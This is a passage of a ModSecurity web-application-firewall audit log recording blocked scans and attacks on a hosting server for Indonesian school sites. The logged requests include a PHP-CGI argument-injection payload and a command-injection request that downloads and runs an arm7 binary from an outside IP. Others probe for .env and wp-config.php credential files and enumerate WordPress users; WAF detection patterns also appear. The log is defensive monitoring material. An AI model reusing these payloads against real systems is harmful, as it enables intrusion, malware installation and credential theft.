aAqVMGLuk3f9kLjsdTbIxgAAAIs 103.236.140.4 55494 103.236.140.4 8181 --f2f58752-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --f2f58752-C-- --f2f58752-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2f58752-E-- --f2f58752-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745524016934292 3826 (- - -) Stopwatch2: 1745524016934292 3826; combined=2675, p1=448, p2=2196, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2f58752-Z-- --64ae563b-A-- [25/Apr/2025:03:05:35 +0700] aAqZj_iVYlyO1xhz7yMCxwAAAMU 103.236.140.4 59986 103.236.140.4 8181 --64ae563b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.51.122.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.51.122.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --64ae563b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64ae563b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745525135017429 3597 (- - -) Stopwatch2: 1745525135017429 3597; combined=2356, p1=716, p2=1601, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64ae563b-Z-- --13a47f0c-A-- [25/Apr/2025:03:33:21 +0700] aAqgEeOdEP6frSVs8CoeEwAAABA 103.236.140.4 48350 103.236.140.4 8181 --13a47f0c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.123.236.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.123.236.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --13a47f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13a47f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745526801600158 3375 (- - -) Stopwatch2: 1745526801600158 3375; combined=1433, p1=508, p2=895, p3=0, p4=0, p5=30, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13a47f0c-Z-- --34c45516-A-- [25/Apr/2025:03:46:00 +0700] aAqjCPKu9d5eAb6Kn9_aqAAAANY 103.236.140.4 51360 103.236.140.4 8181 --34c45516-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 Accept-Charset: utf-8 --34c45516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34c45516-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745527560556398 688 (- - -) Stopwatch2: 1745527560556398 688; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34c45516-Z-- --8b8dc04b-A-- [25/Apr/2025:03:58:04 +0700] aAql3OOdEP6frSVs8CofwQAAAAo 103.236.140.4 54138 103.236.140.4 8181 --8b8dc04b-B-- POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F212.18.104.182%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0 Host: 103.236.140.4 Cookie: uid=admin X-Real-IP: 5.183.209.244 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 5.183.209.244 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozila/5.0 --8b8dc04b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b8dc04b-H-- Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745528284666643 903 (- - -) Stopwatch2: 1745528284666643 903; combined=395, p1=344, p2=0, p3=0, p4=0, p5=51, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b8dc04b-Z-- --1c47940c-A-- [25/Apr/2025:04:15:09 +0700] aAqp3T8HMZgF-3Y3GtE3AAAAAEo 103.236.140.4 58182 103.236.140.4 8181 --1c47940c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.236.146 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.236.146 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --1c47940c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c47940c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745529309094528 879 (- - -) Stopwatch2: 1745529309094528 879; combined=373, p1=334, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c47940c-Z-- --a2c47b02-A-- [25/Apr/2025:04:56:19 +0700] aAqzgz8HMZgF-3Y3GtE5NQAAAEQ 103.236.140.4 39476 103.236.140.4 8181 --a2c47b02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.189.200.35 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.189.200.35 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a2c47b02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2c47b02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745531779393006 2706 (- - -) Stopwatch2: 1745531779393006 2706; combined=1510, p1=444, p2=1035, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2c47b02-Z-- --12f21b2b-A-- [25/Apr/2025:05:03:40 +0700] aAq1POXF4ZX3hX-IbN6ZtwAAAJY 103.236.140.4 41206 103.236.140.4 8181 --12f21b2b-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 143.244.168.161 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 143.244.168.161 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --12f21b2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f21b2b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745532220560083 872 (- - -) Stopwatch2: 1745532220560083 872; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f21b2b-Z-- --6a434c26-A-- [25/Apr/2025:05:13:45 +0700] aAq3meOdEP6frSVs8CokmAAAABc 103.236.140.4 43562 103.236.140.4 8181 --6a434c26-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.99.63.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.99.63.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a434c26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a434c26-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745532825415492 3253 (- - -) Stopwatch2: 1745532825415492 3253; combined=1409, p1=443, p2=936, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a434c26-Z-- --68f10a6b-A-- [25/Apr/2025:05:29:04 +0700] aAq7MD8HMZgF-3Y3GtE77gAAAEU 103.236.140.4 48548 103.236.140.4 8181 --68f10a6b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 64.23.218.208 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 64.23.218.208 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --68f10a6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68f10a6b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533744823561 753 (- - -) Stopwatch2: 1745533744823561 753; combined=283, p1=251, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68f10a6b-Z-- --2e509e42-A-- [25/Apr/2025:05:29:05 +0700] aAq7MT8HMZgF-3Y3GtE77wAAAEY 103.236.140.4 48550 103.236.140.4 8181 --2e509e42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 178.250.95.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.250.95.78 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2e509e42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e509e42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745533745708489 2534 (- - -) Stopwatch2: 1745533745708489 2534; combined=1194, p1=405, p2=762, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e509e42-Z-- --8462472a-A-- [25/Apr/2025:05:32:14 +0700] aAq77uOdEP6frSVs8ComegAAAAs 103.236.140.4 50486 103.236.140.4 8181 --8462472a-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.180.248 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --8462472a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8462472a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533934108173 891 (- - -) Stopwatch2: 1745533934108173 891; combined=371, p1=334, p2=0, p3=0, p4=0, p5=37, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8462472a-Z-- --1a63cc38-A-- [25/Apr/2025:05:32:14 +0700] aAq77vKu9d5eAb6Kn9_gMQAAANY 103.236.140.4 50488 103.236.140.4 8181 --1a63cc38-B-- GET /wp-config.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 188.166.180.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --1a63cc38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a63cc38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745533934131995 719 (- - -) Stopwatch2: 1745533934131995 719; combined=280, p1=251, p2=0, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a63cc38-Z-- --ea08c009-A-- [25/Apr/2025:05:33:04 +0700] aAq8IOXF4ZX3hX-IbN6c9AAAAJc 103.236.140.4 51056 103.236.140.4 8181 --ea08c009-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.6.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.6.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea08c009-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea08c009-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745533984546279 2583 (- - -) Stopwatch2: 1745533984546279 2583; combined=1332, p1=421, p2=881, p3=0, p4=0, p5=29, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea08c009-Z-- --32737b11-A-- [25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elQAAAJI 103.236.140.4 57680 103.236.140.4 8181 --32737b11-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.180.248 Accept-Encoding: gzip X-Varnish: 137399906 --32737b11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32737b11-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745534541311221 866 (- - -) Stopwatch2: 1745534541311221 866; combined=356, p1=317, p2=0, p3=0, p4=0, p5=39, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32737b11-Z-- --916b7402-A-- [25/Apr/2025:05:42:21 +0700] aAq-TeXF4ZX3hX-IbN6elgAAAJM 103.236.140.4 57684 103.236.140.4 8181 --916b7402-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 188.166.180.248 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 188.166.180.248 Accept-Encoding: gzip X-Varnish: 137319573 --916b7402-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --916b7402-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745534541330263 645 (- - -) Stopwatch2: 1745534541330263 645; combined=255, p1=225, p2=0, p3=0, p4=0, p5=29, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --916b7402-Z-- --40ef6125-A-- [25/Apr/2025:05:47:13 +0700] aAq_cT8HMZgF-3Y3GtE_fQAAAEI 103.236.140.4 59132 103.236.140.4 8181 --40ef6125-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.129.169.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.129.169.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40ef6125-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40ef6125-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745534833854478 3237 (- - -) Stopwatch2: 1745534833854478 3237; combined=1329, p1=435, p2=865, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40ef6125-Z-- --2e8daa7b-A-- [25/Apr/2025:06:10:52 +0700] aArE_PKu9d5eAb6Kn9_jmgAAAMI 103.236.140.4 36480 103.236.140.4 8181 --2e8daa7b-B-- GET /wp-json/wp/v2/users/ 